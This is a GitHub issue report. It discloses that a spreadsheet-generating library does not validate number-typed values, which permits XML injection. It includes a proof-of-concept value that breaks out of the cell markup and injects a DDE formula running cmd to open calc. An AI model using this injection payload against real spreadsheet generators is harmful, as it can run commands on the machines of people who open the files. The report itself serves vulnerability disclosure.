Skip to content

There is no check that number is number. This creates a security issue #85

Description

@nicklassigurdh

There is no validation If you have a string as your value for a type number.
This makes it possible to insert xml and create a XML-injection attack

Example:

data: [
        {
            value: 'before</v></c><c r="B1"><f>=cmd|\'/C calc\'!A0</f><v>1</v></c><c r="C1"><v>after',
            type: 'number'
          }]
      ]

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions